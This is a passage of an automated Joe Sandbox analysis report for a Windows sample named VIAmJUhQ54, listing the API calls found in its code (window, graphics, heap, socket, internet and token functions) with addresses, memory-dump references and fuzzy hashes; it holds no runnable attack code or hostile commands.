                                                                                • GetCursorPos.USER32(?), ref: 0078F270
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0079E4C0,?,?,?), ref: 0078F2A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 24c71ac5e6f75eb40f0468d96087ea23fcf1aadb958b995e4bf1051b7b584a4d
                                                                                • Instruction ID: 9486f61d3d2136a5a3e83e2254919303d3a1fc893f5df4365b517629db64d300
                                                                                • Opcode Fuzzy Hash: 24c71ac5e6f75eb40f0468d96087ea23fcf1aadb958b995e4bf1051b7b584a4d
                                                                                • Instruction Fuzzy Hash: 6421B139601028EFCB259F94CC59EEEBBB5FF4A310F448069F9058B2A1D7389D50DB60
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00774358
                                                                                  • Part of subcall function 007743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00774401
                                                                                  • Part of subcall function 007743E2: InternetCloseHandle.WININET(00000000), ref: 0077449E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                • Opcode ID: b733c5047f6ddafac6f23c7adc6afe213e31e2e23fc2027673bd969e1d8397b0
                                                                                • Instruction ID: 16cea256b85aa1f23ba94d178794fa429a44edd17cf564ad9fe4c965f6ac591a
                                                                                • Opcode Fuzzy Hash: b733c5047f6ddafac6f23c7adc6afe213e31e2e23fc2027673bd969e1d8397b0
                                                                                • Instruction Fuzzy Hash: 2821A131200705BBEF259F70DC00FBBB7A9FF85750F10801ABA1EA6690DB7998219B94
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00778AE0
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00778AF2
                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00778AFF
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00778B16
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastacceptselect
                                                                                • String ID:
                                                                                • API String ID: 385091864-0
                                                                                • Opcode ID: 4912562a4b1f1561b0c7e65c6817af8e1294ec6396daed7749843881d3b2eb79
                                                                                • Instruction ID: dfc57543ffe9d0724bdb9523caeca92808a709866f2de760d4e6dc53cf7963ad
                                                                                • Opcode Fuzzy Hash: 4912562a4b1f1561b0c7e65c6817af8e1294ec6396daed7749843881d3b2eb79
                                                                                • Instruction Fuzzy Hash: 0E219672A001249FCB259F68C889ADE7BECEF4A350F008169F84AD7251DB789D418FA0
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00788AA6
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00788AC0
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00788ACE
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00788ADC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: 8a2bd679cf238fa75e58e19faf93e27ce96f635b692d9c9c3d676dc62bb73df1
                                                                                • Instruction ID: a8dcbb594f2881ace92919f2ab9f4037c779e3bf6ff310804e77ae5b26dabf10
                                                                                • Opcode Fuzzy Hash: 8a2bd679cf238fa75e58e19faf93e27ce96f635b692d9c9c3d676dc62bb73df1
                                                                                • Instruction Fuzzy Hash: 7C119331245111AFD758AB14DC09FBA7799BF89320F14811AF916C72E2CB78AC018796
                                                                                APIs
                                                                                  • Part of subcall function 00761E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00760ABB,?,?,?,0076187A,00000000,000000EF,00000119,?,?), ref: 00761E77
                                                                                  • Part of subcall function 00761E68: lstrcpyW.KERNEL32(00000000,?,?,00760ABB,?,?,?,0076187A,00000000,000000EF,00000119,?,?,00000000), ref: 00761E9D
                                                                                  • Part of subcall function 00761E68: lstrcmpiW.KERNEL32(00000000,?,00760ABB,?,?,?,0076187A,00000000,000000EF,00000119,?,?), ref: 00761ECE
                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0076187A,00000000,000000EF,00000119,?,?,00000000), ref: 00760AD4
                                                                                • lstrcpyW.KERNEL32(00000000,?,?,0076187A,00000000,000000EF,00000119,?,?,00000000), ref: 00760AFA
                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0076187A,00000000,000000EF,00000119,?,?,00000000), ref: 00760B2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 9faaf431dd4792fba9b37c4c13df760b21834b030a8b6ffcfcc7f13a21e4daac
                                                                                • Instruction ID: 38df7b12e1fc38e2b436ab92595cd5bc217ca85ecb2e1d5880ba6e7341a6749d
                                                                                • Opcode Fuzzy Hash: 9faaf431dd4792fba9b37c4c13df760b21834b030a8b6ffcfcc7f13a21e4daac
                                                                                • Instruction Fuzzy Hash: F6117F76200305EFDB25AF24DC49D7A77A9FF46354B80806AE80BCB260EB799C51D7E4
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00752FB5
                                                                                  • Part of subcall function 0074395C: __FF_MSGBANNER.LIBCMT ref: 00743973
                                                                                  • Part of subcall function 0074395C: __NMSG_WRITE.LIBCMT ref: 0074397A
                                                                                  • Part of subcall function 0074395C: RtlAllocateHeap.NTDLL(00D60000,00000000,00000001,00000001,00000000,?,?,0073F507,?,0000000E), ref: 0074399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: c281c9149ff13325076641acafe1062c358bc1687ed931ba2132e1b8bf624309
                                                                                • Instruction ID: 3fa366593d855498477ae14d70cc8c405916a7890bef86423d6ea01513107ab9
                                                                                • Opcode Fuzzy Hash: c281c9149ff13325076641acafe1062c358bc1687ed931ba2132e1b8bf624309
                                                                                • Instruction Fuzzy Hash: 7A110D31509315EBCF313FB4AC486A93B98AF453A2F208815FC4D9A1E2DBBCCD45C6A0
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007605AC
                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007605C7
                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007605DD
                                                                                • FreeLibrary.KERNEL32(?), ref: 00760632
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                • String ID:
                                                                                • API String ID: 3137044355-0
                                                                                • Opcode ID: 382521281c92f8d3085b5d5a71692b68c34b57fd548bb6a4dfa843cb8bda4915
                                                                                • Instruction ID: 733ffeb4438ee86486409970f485c77e3a737e50de320f59577a04b847993dea
                                                                                • Opcode Fuzzy Hash: 382521281c92f8d3085b5d5a71692b68c34b57fd548bb6a4dfa843cb8bda4915
                                                                                • Instruction Fuzzy Hash: 5F218E71900209EFDB208FA1DC88ADBBBB8EF80700F00C46DE91796150D778EA59DF91
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00766733
                                                                                • _memset.LIBCMT ref: 00766754
                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007667A6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 007667AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                • String ID:
                                                                                • API String ID: 1157408455-0
                                                                                • Opcode ID: 81015a2f0d4b16f3a4e619f7676f6f513eefd791acd674f2cb2936abd31bd143
                                                                                • Instruction ID: 9f58be8a148d69c5960ab174b1024ff139403ca5c2879d13d0b1ebfa8455906c
                                                                                • Opcode Fuzzy Hash: 81015a2f0d4b16f3a4e619f7676f6f513eefd791acd674f2cb2936abd31bd143
                                                                                • Instruction Fuzzy Hash: E8110A71901228BAE7305BA5AC4DFABBABCEF45724F10419AF905E71C0D2744E84CBA8
                                                                                APIs
                                                                                  • Part of subcall function 0075AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0075AA79
                                                                                  • Part of subcall function 0075AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0075AA83
                                                                                  • Part of subcall function 0075AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0075AA92
                                                                                  • Part of subcall function 0075AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0075AA99
                                                                                  • Part of subcall function 0075AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0075AAAF
                                                                                • GetLengthSid.ADVAPI32(?,00000000,0075ADE4,?,?), ref: 0075B21B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0075B227
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0075B22E
                                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 0075B247
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                • String ID:
                                                                                • API String ID: 4217664535-0
                                                                                • Opcode ID: e6728799eeb1dbd873ec65b97a377155a3baec13c2adb528814d3f1513d32722
                                                                                • Instruction ID: d991600c790844923dbec178b429ec852a9f1509c8f7e8344adedf265610dc33
                                                                                • Opcode Fuzzy Hash: e6728799eeb1dbd873ec65b97a377155a3baec13c2adb528814d3f1513d32722
                                                                                • Instruction Fuzzy Hash: BE118F71A00205FFDB149F94DC85AFEB7A9FF85305F14802DE94297250D7B9AE48CB60
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0075B498
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0075B4AA
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0075B4C0
                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0075B4DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 52496a55aa20b85ec220ce2a2174c669b2f80403dd3f712e9ee3aa40ce7ab9e0
                                                                                • Instruction ID: f4cc482ade2833f5c239b19c73f1a796f8d80defa7ea27c500f6d3114313c86a
                                                                                • Opcode Fuzzy Hash: 52496a55aa20b85ec220ce2a2174c669b2f80403dd3f712e9ee3aa40ce7ab9e0
                                                                                • Instruction Fuzzy Hash: 04115A7A900218FFDB21DFA8C885EEDBBB4FB08700F204095EA04B7290D771AE11DB94
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0073B5A5
                                                                                • GetClientRect.USER32(?,?), ref: 0079E69A
                                                                                • GetCursorPos.USER32(?), ref: 0079E6A4
                                                                                • ScreenToClient.USER32(?,?), ref: 0079E6AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 4127811313-0
                                                                                • Opcode ID: 2d7019d7c4534a85a687e5ec1e67609d79ab672da4dcc6fad09b0cdc6f0eeb8a
                                                                                • Instruction ID: 40cb731615607d7ab2f84d1d3562c374a8488ea7bfd9f306ed405bfdb94d5db2
                                                                                • Opcode Fuzzy Hash: 2d7019d7c4534a85a687e5ec1e67609d79ab672da4dcc6fad09b0cdc6f0eeb8a
                                                                                • Instruction Fuzzy Hash: 9B110631A01029FBDB10DFA4DC8A9AE77B9EB49304F504455FA02E7141D738AAA1CBA5
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00767352
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00767385
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0076739B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007673A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: edc965c4b6e5d112fde58a66e2084bc2fe6307776252d469f0054dfa9232046a
                                                                                • Instruction ID: 18139fdf743cec68221773152e56f113b9bdccd14a4f3badf5240cbad21079ac
                                                                                • Opcode Fuzzy Hash: edc965c4b6e5d112fde58a66e2084bc2fe6307776252d469f0054dfa9232046a
                                                                                • Instruction Fuzzy Hash: 1D110872A04284AFC7059B68DC49A9E7BADAB89354F148315FD22E3391D7788D108BA4
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0073D1BA
                                                                                • GetStockObject.GDI32(00000011), ref: 0073D1CE
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0073D1D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: 39dc43937034e455211aad94a2cb6546483a5ecc9dba1c61fed145519fde61df
                                                                                • Instruction ID: 9794af917b408950b472293ae10ecfa294556295563fb5ff75393cdeecd5f393
                                                                                • Opcode Fuzzy Hash: 39dc43937034e455211aad94a2cb6546483a5ecc9dba1c61fed145519fde61df
                                                                                • Instruction Fuzzy Hash: 0711AD7250150DBFEF224F90EC54EEABB6AFF49364F054105FA0552050C739DD609BA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction ID: f2f4149313bbc555d3077f0f1c23a625bca7a5a45e37334947cf4dfe43c09be8
                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction Fuzzy Hash: 69017E3200018EFBCF125F94DC168EE3F23BB1835AB488415FE1859030D37ACAB5AB81
                                                                                APIs
                                                                                  • Part of subcall function 00747A0D: __getptd_noexit.LIBCMT ref: 00747A0E
                                                                                • __lock.LIBCMT ref: 0074748F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 007474AC
                                                                                • _free.LIBCMT ref: 007474BF
                                                                                • InterlockedIncrement.KERNEL32(00D87258), ref: 007474D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 2704283638-0
                                                                                • Opcode ID: 42b6bd58d3ac2abf7ee9db53bd05e65fb21bc250e585f7e14c878bd4ccf855bf
                                                                                • Instruction ID: dec544cacb3c8e9ad2e8e23f4649f18566238a3d009b94f5fbdbbe8612267fcc
                                                                                • Opcode Fuzzy Hash: 42b6bd58d3ac2abf7ee9db53bd05e65fb21bc250e585f7e14c878bd4ccf855bf
                                                                                • Instruction Fuzzy Hash: A701923690A661EBCB2AAF6C9809B6DBB70BF05710F168006F81477690CB3C6D41CFD6
                                                                                APIs
                                                                                  • Part of subcall function 0073AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0073AFE3
                                                                                  • Part of subcall function 0073AF83: SelectObject.GDI32(?,00000000), ref: 0073AFF2
                                                                                  • Part of subcall function 0073AF83: BeginPath.GDI32(?), ref: 0073B009
                                                                                  • Part of subcall function 0073AF83: SelectObject.GDI32(?,00000000), ref: 0073B033
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0078EA8E
                                                                                • LineTo.GDI32(00000000,?,?), ref: 0078EA9B
                                                                                • EndPath.GDI32(00000000), ref: 0078EAAB
                                                                                • StrokePath.GDI32(00000000), ref: 0078EAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
